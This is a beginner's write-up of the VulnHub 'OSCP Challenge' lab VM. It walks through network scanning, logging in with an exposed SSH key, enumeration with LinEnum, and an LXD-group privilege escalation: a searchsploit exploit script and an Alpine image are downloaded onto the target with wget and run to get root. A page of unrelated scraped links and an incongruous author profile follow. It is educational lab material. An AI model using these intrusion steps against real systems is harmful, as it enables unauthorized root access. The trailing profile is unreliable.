CTF : The OSCP Challenge (2024)

Hello friends,

In July of 2020, a neat challenge appeared in the VulnHub page. It was an OSCP Challenge.

The creator FalconSpy did a great write up of the VM, and the many ways to solve it.
It was marked as “Easy”, keep in mind this term is used frequently, but in actuality, there is no specific way to measure the “easy-ness” of any of these challenges, so it is left to the creator to decided that.

I am a beginner, in the pen testing / cyber / hacking field, and I have come to find out, that all of the “easy” challenge I’ve come across (including this one) should be considered “Intermediate” for anyone who is a beginner, so I approach all challenges with that mentality, and that does help.

These challenges are usually designed to be solved in multiple ways, because we all approach it differently, I used the methods that I know, I’ve had to do some research and tried many things that didn’t work, so your experience may vary.

An expert hacker I know, was able to solve it in 45 minutes.
Me? It took me 3 weeks, but I did solve it, and if I can do it, so can you.

The Goal of the OSCP challenge:
1. Become root.
2. Read the “flag.txt” located in root directory
.

Lets get started.

//SCAN

After making sure the VM is running you now must find its IP. Usually one of these would do the trick for you.

netdiscover
arp-scan -L
arp-scan — interface=wlan0 — localnet (wifi)
arp-scan — interface=eth0 — localnet (cabled)

Neat Trick:
When you set up your VM, you can change the MAC address to something that would make it easy for you to identify that it’s the right machine.

//BROWSE

Now that I have an IP, I open up a browser and go to it, it is a landing page with general information about the challenge, but as I read closely I noticed a couple of things.

  1. They say the only user on this box is “OSCP”.
    Yet the post is made by an ‘admin’ account.

2. Its a wordpress site.

//MASSCAN

This tool does a quicker scan than nmap, but due to its quickness, it may miss something.

masscan [the VM’s IP] -p0–65535 — rate 5000

Results:
33060/tcp on [the VM’s IP]
80/tcp on [the VM’s IP]
22/tcp on [the VM’s IP]

My friend was also doing this challenge and he ran an nmap scan since I was doing the masscan, and he came across a “/secret.txt” finding, so that was my next step.

//SECRET PAGE

On the browser I went to that page.
[the VM’s IP]/secret.txt

It was a text file of an open SSH key.
Save it locally, and called it “sk3”.
Had to adjust its permissions in order for it to work.
chmod 600 sk3.

Tried SSH-ing as admin with that key.
ssh -i sk3 admin@[the VM’s IP]
Didn’t work

Tried the root account
ssh -i sk3 root@[the VM’s IP]
Didn’t work.

Then I remembered the post about OSCP being a user on this machine so I tried this.
ssh -i sk3 oscp@[the VM’s IP]
That worked! I’m in the system.

//TOUCH STUFF

Now that I’m in, I need to know what kind of things I can do. An easy way is the “touch” command. So I typed this.
touch anything

That worked, it created a file called “anything”, so that told me that I have the ability to create things. Excellent.
So I created a directory (folder) called ryno
mkdir ryno

I move into it
cd ryno

//ENUMERATE

Out of the tools that I’ve tried, “linENUM” gave me the result I needed, but the trick with linENUM is it has to run in the machine your attaching, so while logged in (and in my ryno folder) I had to download that file and run it.

LinENUM
Its a git hub repo, so you run the “git clone” command to get it.
git clone https://github.com/rebootuser/LinEnum.git

Now, you have to make the “LinEnum.sh” file executable. So navigate to where the file is located, and run this command.
chmod +x LinEnum.sh

Now, you can run it, this is the command that gave me some nice results.
./LinEnum.sh -k keyword -r report -e /tmp/ -t

LinEnum Result:
Tells us we are part of the (lxd) group.
I’m not familiar with that group, so I go to The Oracle (aka Google) to learn more about LXD (Linux Daemon).
Apparently there is an LXC/LXD Priviledge Escalaction (Priv Esc).
So I research how this is done, for my next step.

//PRIV ESC

I needed 3 things for this to work:
[1] — The Alpine Builder File.
[2] — An .sh file with the lxc/lxd exploit.
[3] — A way to get it loaded into the VM to run the exploit.

[1] — The Alpine File.
Download the “Apline Builder”.
git clone https://github.com/saghul/lxd-alpine-builder.git

Navigate into the folder you just cloned.
cd lxd-alpine-builder

chmod +x & run the following file.
./build-alpine

That creates a tar file that we will need to upload to the machine.
alpine-v3.12-x86_64–20200801_2112.tar.gz

[2] — The .sh File
I used searchspolit in my terminal to find the exploit.
searchspolit lxd
You are looking for “linux/local/46978.sh

Copy it over locally.
searchsploit -m 46978.sh

To be safe I made a copy called “ryno.sh”
cp 46978.sh > ryno.sh

When I tried to run that file, it gave me “bash\r” error.
After some research I found a way to created a new file removing the ‘\r’ and called it ‘r2.sh’, which fixed that issue.
sed $’s/\r$//’ ./ryno.sh > ./r2.sh

[3] — The PYTHON server
This is how I will upload the file from my local box to the VM I’m attacking.

On my machine:
Made sure I’m in the same folder that the Alpine & the r2.sh file are.
Ran this command.
python -m SimpleHTTPServer
(that creates the server (your ip) with port 8000)

On the VM machine:
Since I’m SSH-ed in, I upload the 2 files.
Make sure your in the folder that you had created earlier.

Upload the alpine file.
wget http://<your ip>:8000/alpine-v3.12-x86_64–20200801_2112.tar.gz

Upload the r2.sh.
wget http://<your ip>:8000/r2.sh

We need to adjust the permissions for BOTH files in order for it to work.
chmod 777 “both files”

Note:
Instructions may tell you to go to /tmp, but if you do, it may not work for you, and give you a “file not found” error, so its safer to do all of this from the directory you created.

//LETS RUN

Now that we have everything place, lets run the exploit.
I used this command.
./r2.sh -f alpine-v3.12-x86_64–20200801_2112.tar.gz

If you get a “command not found” for LXC, you just need to add it to the PATH.
Find the location of‘lxc’.
locate lxc
It was located in the following area:
/snap/bin/

Now lets add it to the $PATH
echo $PATH
export PATH=”$PATH:/snap/bin”
That should fix it.

When that exploit runs properly, you will see a different shell prompt.
Check who you are.
id
(you should be root)

Lets get to the flag.
cd /mnt/root/root
ls

(you should see the flag.txt and read it)
Challenge completed.

[R/F]

CTF : The OSCP Challenge (2024)
Top Articles
Synthesis, characterization, X-ray structure and biological activities of C-5-bromo-2-hydroxyphenylcalix[4]-2-methyl resorcinarene. - PDF Download Free
(Get Answer) - Identify the 4 statements about inorganic compound chemical...| Transtutors
Hotels
Zabor Funeral Home Inc
OnTrigger Enter, Exit ...
Matthew Rotuno Johnson
Synq3 Reviews
The Connecticut Daily Lottery Hub
Calmspirits Clapper
6813472639
Patrick Bateman Notebook
Elemental Showtimes Near Cinemark Flint West 14
Missouri Highway Patrol Crash
Noaa Ilx
Labby Memorial Funeral Homes Leesville Obituaries
Schedule 360 Albertsons
Huntersville Town Billboards
PowerXL Smokeless Grill- Elektrische Grill - Rookloos & geurloos grillplezier - met... | bol
The best firm mattress 2024, approved by sleep experts
A Biomass Pyramid Of An Ecosystem Is Shown.Tertiary ConsumersSecondary ConsumersPrimary ConsumersProducersWhich
The BEST Soft and Chewy Sugar Cookie Recipe
Never Give Up Quotes to Keep You Going
Homeaccess.stopandshop
Ac-15 Gungeon
Atlases, Cartography, Asia (Collection Dr. Dupuis), Arch…
Best Sports Bars In Schaumburg Il
Del Amo Fashion Center Map
Prep Spotlight Tv Mn
Watertown Ford Quick Lane
Expression&nbsp;Home&nbsp;XP-452 | Grand public | Imprimantes jet d'encre | Imprimantes | Produits | Epson France
30+ useful Dutch apps for new expats in the Netherlands
Account Now Login In
Ff14 Laws Order
Bursar.okstate.edu
Six Flags Employee Pay Stubs
Pill 44615 Orange
What Are Digital Kitchens & How Can They Work for Foodservice
Husker Football
Anderson Tribute Center Hood River
Trivago Anaheim California
Unblocked Games Gun Games
Lamp Repair Kansas City Mo
2Nd Corinthians 5 Nlt
Copd Active Learning Template
The Complete Uber Eats Delivery Driver Guide:
Heat Wave and Summer Temperature Data for Oklahoma City, Oklahoma
Mawal Gameroom Download
Nfsd Web Portal
Rise Meadville Reviews
Public Broadcasting Service Clg Wiki
Duffield Regional Jail Mugshots 2023
Latest Posts
Article information

Author: Rob Wisoky

Last Updated:

Views: 5811

Rating: 4.8 / 5 (68 voted)

Reviews: 83% of readers found this page helpful

Author information

Name: Rob Wisoky

Birthday: 1994-09-30

Address: 5789 Michel Vista, West Domenic, OR 80464-9452

Phone: +97313824072371

Job: Education Orchestrator

Hobby: Lockpicking, Crocheting, Baton twirling, Video gaming, Jogging, Whittling, Model building

Introduction: My name is Rob Wisoky, I am a smiling, helpful, encouraging, zealous, energetic, faithful, fantastic person who loves writing and wants to share my knowledge and understanding with you.